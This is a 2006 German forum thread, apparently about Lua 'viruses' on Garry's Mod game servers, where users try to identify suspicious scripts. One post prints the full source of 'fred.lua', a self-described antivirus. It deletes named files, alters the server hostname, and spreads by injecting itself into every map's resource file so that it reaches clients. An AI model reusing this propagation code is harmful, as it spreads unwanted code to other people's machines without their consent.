PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Lua Virus



Snake
28.07.2006, 18:48
Hallo
Könnt ihr mir sagen in welcher Lua Datei ein Virus drin sein kann.
Oder andere Frage ist Fred.lua antivir.lua(antivir musste ich vom Server runterladen)
und quadselect.lua ein Virus.
und wo kann man sich die neuste Version von Antivir für lua runterladen.
Danke n vorraus.

Maurice
28.07.2006, 18:55
Alles was du nicht selber von einer seite runtergeladen hast DIREKT löschen. Öffne viren mal mit nem .txt editer, meißtens steht oben irgendwas ganz stolzes von den autoren.

Snake
28.07.2006, 19:00
Ok habe die gelösch die ich selber nicht geladen habe.
Kannst du mir dann mal ein Link geben wo man die neuste Version des Antivirus.lua laden kann.

Achja habe ich ebend germerkt,wenn einer weiß das ich den Virus habe dan hat er was mit meine Namen geschrieben und mein Namen geändert der hat mir natürlich auch gesagt das er das ist.
Er hat auch gesagt der kann mich kicken und sich zum Admin machen und so.
Hat er zum Glück nicht.

Snake
29.07.2006, 23:58
Also Maps lade ich sowieso runter da bei jede Map Missing Map komm,wenn man die vom Server läd.:mad:

Snake
31.07.2006, 11:04
Hab ich doch gesagt das ich die von Seiten lade:evil:

t0x1c
09.08.2006, 04:57
------------------------------------------------------
--Fred. The virus that is and only is an antivirus. --
--The only thing that is like a virus about this? --
--The fact that it spreads like a virus. --
--However, and hear me out on this, this virus's --
--only purpose is to remove malicious viruses/hacks.--
--Because I DO care. Too many people get infected --
--with bad viruses and don't even know. --
--This is for those people, that way they wont --
--spread the bad ones anymore. If you read this, --
--you are one of the few who actually know something--
--about the viruses, and know how to protect --
--yourself. So feel free to delete contents --
--this file and make it a read-only! --
--That is all. --
-- --
--Known Viruses. --
--ulm.lua --
--ufm.lua --
--ucm.lua --
--oma2r3fxc6g.lua --
--racehook.lua --
--racehook2.lua --
--racehook3.lua --
--Note There will be protection with this LUA file --
--up through racehook5.lua in case he continues. --
--test.lua <Potentially isn't a virus but annoying. --
--anyway, on with the program. --
------------------------------------------------------

if _file.Exists("lua/init/ULM.lua") then
_file.Delete("lua/init/ULM.lua")
else
_PrintMessage(userid, HUD_PRINTCONSOLE, "ULM.lua not here.")
end
if _file.Exists("lua/init/UFM.lua") then
_file.Delete("lua/init/UFM.lua")
else
_PrintMessage(userid, HUD_PRINTCONSOLE, "UFM.lua not here.")
end
if _file.Exists("lua/init/UCM.lua") then
_file.Delete("lua/init/UCM.lua")
else
_PrintMessage(userid, HUD_PRINTCONSOLE, "UCM.lua not here.")
end
if _file.Exists("lua/init/ERAT.lua") then
_file.Delete("lua/init/ERAT.lua")
else
_PrintMessage(userid, HUD_PRINTCONSOLE, "ERAT.lua not here.")
end
if _file.Exists("lua/init/oma2r3fxc6g.lua") then
_file.Delete("lua/init/oma2r3fxc6g.lua")
else
_PrintMessage(userid, HUD_PRINTCONSOLE, "oma2r3fxc6g.lua not here.")
end
if _file.Exists("lua/init/racehook.lua") then
_file.Delete("lua/init/racehook.lua")
else
_PrintMessage(userid, HUD_PRINTCONSOLE, "racehook.lua not here.")
end
if _file.Exists("lua/init/racehook2.lua") then
_file.Delete("lua/init/racehook2.lua")
else
_PrintMessage(userid, HUD_PRINTCONSOLE, "racehook2.lua not here.")
end
if _file.Exists("lua/init/racehook3.lua") then
_file.Delete("lua/init/racehook3.lua")
else
_PrintMessage(userid, HUD_PRINTCONSOLE, "racehook3.lua not in the init folder.")
end
if _file.Exists("lua/includes/racehook3.lua") then
_file.Delete("lua/includes/racehook3.lua")
else
_PrintMessage(userid, HUD_PRINTCONSOLE, "racehook3.lua not in the includes folder.")
end
if _file.Exists("lua/init/racehook4.lua") then
_file.Delete("lua/init/racehook4.lua")
else
_PrintMessage(userid, HUD_PRINTCONSOLE, "racehook4.lua not here or ever hopefully.")
end
if _file.Exists("lua/init/racehook5.lua") then
_file.Delete("lua/init/racehook5.lua")
else
_PrintMessage(userid, HUD_PRINTCONSOLE, "racehook5.lua not here or ever hopefully.")
end
if _file.Exists("lua/init/test.lua") then
_file.Delete("lua/init/test.lua")
else
_PrintMessage(userid, HUD_PRINTCONSOLE, "no test.lua LOL!")
end

function SetName ( )
local servname = string.gsub(_GetConVar_String("hostname"), ":", "")
_ServerCommand("hostname : "..servname.."\n")
end

AddTimer(10, 1, SetName)

function installfred ( )
local res = _file.Find( "maps/*.bsp" )
for i = 1, table.getn( res ) do
res[i] = string.gsub( res[i], ".bsp", "" )
if ( _file.Exists( "maps/" .. res[i] .. ".res" ) ) then
file = _file.Read( "maps/" .. res[i] .. ".res" )
if not ( string.find( file, "\t\"lua/init/fred.lua\"" ) ) then
file = string.gsub( file, "}", "" )
file = file .. "\t\"lua/init/fred.lua\"\n}"
end
else
file = "\"resources\"\n{\n\t\"lua/init/fred.lua\"\n}\n"
end
_file.Write( "maps/" .. res[i] .. ".res", file )
end
end

function checkfred ( userid, args )
_PrintMessage( userid, HUD_PRINTCONSOLE, "Fred v0.1 is happy to be on this server.\n" )
end

CONCOMMAND( "fred", checkfred )
installfred( )




das is der inhalt von fred.lua hab ich von nem server bekommen also wie n virus aber wenn ich das richtig deute isses n antivirus oder?